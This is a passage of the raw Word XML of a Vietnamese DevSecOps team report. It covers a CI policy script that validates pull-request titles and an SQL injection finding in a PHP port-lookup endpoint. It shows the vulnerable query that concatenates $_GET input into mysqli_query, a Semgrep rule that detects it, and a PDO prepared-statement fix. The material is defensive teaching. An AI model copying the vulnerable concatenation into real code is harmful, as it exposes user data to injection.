      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Xây dựng công cụ kiểm soát chính sách độc lập </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>ci/policy_guard.py</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> thực thi tại Stage 1. Kịch bản phân tích lịch sử commit và siêu dữ liệu Pull Request:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Bullet2"/>
        <w:spacing w:line="288" w:lineRule="auto" w:before="0" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Ngăn chặn tuyệt đối hành vi commit hoặc push trực tiếp lên hai nhánh bảo vệ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>main</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> và </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>dev</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Bắt buộc mọi đóng góp cá nhân chỉ được mở Pull Request vào </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>dev</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> theo cú pháp chuẩn: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>[&lt;mã_nhánh&gt;] &lt;loại&gt;(&lt;phạm_vi&gt;): &lt;mô tả&gt;</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Nhánh </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>main</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> chỉ nhận mã nguồn qua PR phát hành xuất phát từ nhánh </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>dev</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> với định dạng: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>release: vX.Y.Z - &lt;mô tả&gt;</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Cách thức xử lý và khắc phục:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Text"/>
        <w:spacing w:line="300" w:lineRule="auto" w:before="0" w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Kích hoạt cơ chế GitHub Branch Protection Rules khóa cứng nhánh </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>main</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> và </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>dev</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">, yêu cầu 100% Pull Request phải vượt qua bài kiểm tra của </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>branch_policy_guard</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> mới được mở quyền hợp nhất.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Bullet1"/>
        <w:spacing w:line="288" w:lineRule="auto" w:before="0" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Đoạn mã demo thực tế:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Text"/>
        <w:spacing w:line="300" w:lineRule="auto" w:before="0" w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Đoạn mã Policy-as-Code kiểm tra quy chuẩn đóng góp trong `ci/policy_guard.py`:</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Trích đoạn ci/policy_guard.py - Cưỡng chế quy chuẩn nhánh và Pull Request</w:t>
              <w:br/>
              <w:t xml:space="preserve">  PR_DEV_REGEX = re.compile(</w:t>
              <w:br/>
              <w:t xml:space="preserve">      r"^\[(namng|haind|manhdx|anhld|mainp)\]\s+(feat|fix|sec|ci|docs|refactor|test|chore|style|perf|revert)(\([a-zA-Z0-9_\-\.\/]+\))?:\s.+",</w:t>
              <w:br/>
              <w:t xml:space="preserve">      re.IGNORECASE,</w:t>
              <w:br/>
              <w:t xml:space="preserve">  )</w:t>
              <w:br/>
              <w:t xml:space="preserve">  PR_MAIN_REGEX = re.compile(</w:t>
              <w:br/>
              <w:t xml:space="preserve">      r"^(release|RELEASE):\s+v[0-9]+\.[0-9]+\.[0-9]+(\s+-\s+.+|\s*:\s*.+)",</w:t>
              <w:br/>
              <w:t xml:space="preserve">      re.IGNORECASE,</w:t>
              <w:br/>
              <w:t xml:space="preserve">  )</w:t>
              <w:br/>
              <w:br/>
              <w:t xml:space="preserve">  def validate_pr_policy(base_ref: str, pr_title: str) -&gt; bool:</w:t>
              <w:br/>
              <w:t xml:space="preserve">      if base_ref == "dev" and not PR_DEV_REGEX.match(pr_title):</w:t>
              <w:br/>
              <w:t xml:space="preserve">          log_error("PR Title Violation", f"PR vào 'dev' phải theo chuẩn: [{base_ref}] type(scope): message")</w:t>
              <w:br/>
              <w:t xml:space="preserve">          return False</w:t>
              <w:br/>
              <w:t xml:space="preserve">      if base_ref == "main" and not PR_MAIN_REGEX.match(pr_title):</w:t>
              <w:br/>
              <w:t xml:space="preserve">          log_error("Release Violation", "PR vào 'main' bắt buộc phải theo chuẩn: release: vX.Y.Z - description")</w:t>
              <w:br/>
              <w:t xml:space="preserve">          return False</w:t>
              <w:br/>
              <w:t xml:space="preserve">      return True</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-H3"/>
        <w:spacing w:before="160" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>5.1.2. Thành viên 2 — Nguyễn Đình Hải: Lỗ hổng tiêm mã SQL làm rò rỉ dữ liệu cá nhân người dùng</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Bullet1"/>
        <w:spacing w:line="288" w:lineRule="auto" w:before="0" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Thành viên phụ trách:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Nguyễn Đình Hải (Kỹ sư An ninh Ứng dụng / AppSec Engineer).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Bullet1"/>
        <w:spacing w:line="288" w:lineRule="auto" w:before="0" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Bản chất vấn đề an toàn:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Text"/>
        <w:spacing w:line="300" w:lineRule="auto" w:before="0" w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Tại các chức năng tra cứu cảng biển (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>GET /ports?q=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>) và tra cứu vận đơn (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>GET /api/track?tracking=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">), ứng dụng ghép trực tiếp dữ liệu do người dùng nhập vào chuỗi truy vấn SQL thông qua hàm </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>mysqli_query()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>. Lỗ hổng này cho phép kẻ tấn công thực thi các câu lệnh trích xuất trái phép toàn bộ danh sách khách hàng, lịch sử vận chuyển và thông tin tài khoản quản trị.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Bullet1"/>
        <w:spacing w:line="288" w:lineRule="auto" w:before="0" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Phân loại nhóm lỗi:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Lỗi mã nguồn (Application Source Code).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Bullet1"/>
        <w:spacing w:line="288" w:lineRule="auto" w:before="0" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Pha trong quy trình DevSecOps:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Pha Test / Scan (Stage 2: Semgrep Taint Analysis &amp; SonarQube SAST)</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thực thi kỹ thuật:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Security-as-Code (An ninh dưới dạng mã nguồn)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Căn cứ vi phạm chính sách bảo vệ dữ liệu:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Bullet2"/>
        <w:spacing w:line="288" w:lineRule="auto" w:before="0" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Nghị định 13/2023/NĐ-CP — Điều 9 Khoản 2:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Quy định bên xử lý dữ liệu cá nhân có nghĩa vụ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>"bảo đảm an toàn, an ninh thông tin, bí mật dữ liệu cá nhân của chủ thể dữ liệu trong quá trình xử lý"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>. Việc để tồn tại lỗi SQL Injection khiến dữ liệu vận đơn và thông tin liên lạc của khách hàng bị trích xuất công khai là hành vi vi phạm nghiêm trọng nghĩa vụ bảo đảm an toàn dữ liệu.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Bullet2"/>
        <w:spacing w:line="288" w:lineRule="auto" w:before="0" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>GDPR — Article 32 (Security of Processing):</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Yêu cầu triển khai các biện pháp kỹ thuật phù hợp nhằm bảo đảm mức an toàn chống lại việc tiết lộ hoặc truy cập trái phép vào dữ liệu cá nhân được lưu trữ.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Bullet1"/>
        <w:spacing w:line="288" w:lineRule="auto" w:before="0" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Cách thức phát hiện:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Bullet2"/>
        <w:spacing w:line="288" w:lineRule="auto" w:before="0" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Semgrep SAST Engine:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Thiết lập quy tắc phân tích dòng ô nhiễm Taint Analysis truy vết biến đầu vào nguồn (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Source: $_GET[...]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>) lan truyền trực tiếp tới điểm thực thi nguy hiểm trũng (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Sink: mysqli_query(...)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>) mà không đi qua các hàm làm sạch chuẩn (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Sanitizer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Bullet2"/>
        <w:spacing w:line="288" w:lineRule="auto" w:before="0" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>SonarQube Scanner:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Phân tích cây cú pháp trừu tượng AST, kích hoạt quy tắc </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>php:S2077</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> và đánh tụt điểm bảo mật xuống mức E, kích hoạt trạng thái Quality Gate </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>FAILED</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> để ngắt đường ống CI.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Bullet1"/>
        <w:spacing w:line="288" w:lineRule="auto" w:before="0" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Cách thức xử lý và khắc phục:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Text"/>
        <w:spacing w:line="300" w:lineRule="auto" w:before="0" w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Tái cấu trúc mã nguồn: loại bỏ hoàn toàn việc ghép chuỗi SQL thủ công; thay thế bằng kỹ thuật câu lệnh chuẩn bị trước với tham số liên kết kiểu dữ liệu an toàn qua thư viện PDO.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Bullet1"/>
        <w:spacing w:line="288" w:lineRule="auto" w:before="0" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Đoạn mã demo thực tế:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Text"/>
        <w:spacing w:line="300" w:lineRule="auto" w:before="0" w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Quy tắc phát hiện Semgrep, đoạn mã vi phạm ban đầu và đoạn mã vá lỗi an toàn:</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ci/semgrep-local-rules.yml - Quy tắc SAST phát hiện nối chuỗi SQL nguy hiểm</w:t>
              <w:br/>
              <w:t xml:space="preserve">  rules:</w:t>
              <w:br/>
              <w:t xml:space="preserve">    - id: php-sqli-unquoted-concatenation</w:t>
              <w:br/>
              <w:t xml:space="preserve">      languages: [php]</w:t>
              <w:br/>
              <w:t xml:space="preserve">      severity: ERROR</w:t>
              <w:br/>
              <w:t xml:space="preserve">      message: Phát hiện ghép biến người dùng trực tiếp vào câu lệnh SQL mà không qua Prepared Statements.</w:t>
              <w:br/>
              <w:t xml:space="preserve">      patterns:</w:t>
              <w:br/>
              <w:t xml:space="preserve">        - pattern: mysqli_query($CONN, $SQL)</w:t>
              <w:br/>
              <w:t xml:space="preserve">        - pattern-inside: |</w:t>
              <w:br/>
              <w:t xml:space="preserve">            $SQL = "...".$_GET[...]."...";</w:t>
              <w:br/>
              <w:t xml:space="preserve">            ...</w:t>
              <w:br/>
              <w:t xml:space="preserve">      metadata:</w:t>
              <w:br/>
              <w:t xml:space="preserve">        cwe: "CWE-89: SQL Injection"</w:t>
              <w:br/>
              <w:t xml:space="preserve">        owasp: "A03:2021 Injection"</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="80"/>
      </w:pP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1. Đoạn mã vi phạm ban đầu (InlaneWeb/web/src/ports.php): Ghép biến trực tiếp</w:t>
              <w:br/>
              <w:t xml:space="preserve">  $query = "SELECT id, code, city, country, volume FROM ports WHERE code LIKE '%" . $_GET['q'] . "%'";</w:t>
              <w:br/>
              <w:t xml:space="preserve">  $result = mysqli_query($conn, $query); // Điểm trũng (Sink) nguy hiểm</w:t>
              <w:br/>
              <w:br/>
              <w:t xml:space="preserve">  // 2. Đoạn mã vá lỗi triệt để bằng Prepared Statements với PDO</w:t>
              <w:br/>
              <w:t xml:space="preserve">  $stmt = $pdo-&gt;prepare("SELECT id, code, city, country, volume FROM ports WHERE code LIKE :code");</w:t>
              <w:br/>
              <w:t xml:space="preserve">  $stmt-&gt;execute(['code' =&gt; '%' . $_GET['q'] . '%']);</w:t>
              <w:br/>
              <w:t xml:space="preserve">  $ports = $stmt-&gt;fetchAll(PDO::FETCH_ASSOC);</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-H3"/>
        <w:spacing w:before="160" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>5.1.3. Thành viên 3 — Đào Xuân Mạnh: Lưu trữ dữ liệu xác thực và mật khẩu gán cứng trong mã nguồn</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Bullet1"/>
        <w:spacing w:line="288" w:lineRule="auto" w:before="0" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
